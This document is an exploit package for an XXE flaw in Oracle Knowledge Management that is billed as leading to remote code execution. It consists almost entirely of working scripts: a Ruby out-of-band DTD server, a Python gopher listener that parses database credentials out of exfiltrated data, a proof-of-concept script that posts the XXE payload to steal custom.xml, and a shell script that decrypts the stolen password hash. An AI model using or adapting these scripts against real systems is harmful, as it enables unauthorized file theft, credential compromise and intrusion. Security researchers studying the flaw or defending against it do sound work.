Oracle Knowledge Management XXE Leading to a RCE

xxeserve.rb #!/usr/bin/env ruby # Notes: # - This is the out of band xxe server that is used to retrieve the file and send it via the gopher protocol # - ruby xxeserve.rb -o 0.0.0.0 require 'sinatra' get "/" do return "OHAI" if params[:p].nil? f = File.open("./files/#{request.ip}#{Time.now.to_i}","w") f.write(params[:p]) f.close "" end get "/xml" do return "" if params[:f].nil? <<END <!ENTITY % payl SYSTEM "file:///#{params[:f]}"> <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'gopher://#{request.host}:1337/?%payl;'>"> END end gopher.py #!/usr/bin/python # Notes: # - This code just listens for client requests on port 1337 # - it looks for database strings and prints them out import socket import sys import re # Create a TCP/IP socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Bind the socket to the port server_address = ('0.0.0.0', 1337) print >>sys.stderr, 'starting up on %s port %s' % server_address sock.bind(server_address) # Listen for incoming connections sock.listen(1) while True: # Wait for a connection print >>sys.stderr, 'waiting for a connection' connection, client_address = sock.accept() try: print >>sys.stderr, 'connection from', client_address # Receive the data in small chunks and retransmit it while True: data = connection.recv(2048) if data: #print data matchuser = re.search("<user>(.*)</user>", data) matchpassword = re.search("<password>(.*)</password>", data) matchurl = re.search("<url>(.*)</url>", data) if matchuser and matchpassword and matchurl: print "(+) The database SID is: %s" % matchurl.group(1) print "(+) The database username is: %s" % matchuser.group(1) print "(+) The database password is: %s" % matchpassword.group(1) connection.close() sys.exit(1) connection.close() sys.exit(1) else: print >>sys.stderr, 'no more data from', client_address break except Exception: connection.close() finally: # Clean up the connection connection.close() poc.py #!/usr/bin/python # Notes: # - This code steals the C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml file via the XXE bug. # - You need to run ruby xxeserve.rb -o 0.0.0.0 and use an interface ip for the "local xxe server" # - The code requires a proxy server to be setup on 127.0.0.1:8080 although, this can be changed import requests import json import sys # burp, ftw proxies = { "http": "http://127.0.0.1:8080", } if len(sys.argv) < 3: print "(+) Usage: %s [local xxe server:port] [target]" % sys.argv[0] print "(+) Example: %s 172.16.77.1:4567 172.16.77.128" % sys.argv[0] sys.exit(1) localxxeserver = sys.argv[1] target = sys.argv[2] payload = {'method' : '2', 'inputXml': '''<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY %% remote SYSTEM "http://%s/xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml"> %%remote; %%int; %%trick;]>''' % localxxeserver} url = 'http://%s:8226/imws/Result.jsp' % target headers = {'content-type': 'application/x-www-form-urlencoded'} print "(+) pulling custom.xml for the db password..." r = requests.post(url, data=payload, headers=headers, proxies=proxies) if r.status_code == 200: print "(!) Success! please check the gopher.py window!" decrypt.sh #!/bin/sh if [ "$#" -ne 1 ]; then echo "(!) Usage: $0 [hash]" else java -classpath "infra_encryption.jar:oraclepki.jar:osdt_core.jar:osdt_cert.jar:commons-codec-1.3.jar" -DKEYSTORE_LOCATION="keystore" com.inquira.infra.security.OKResourceEncryption $1 fi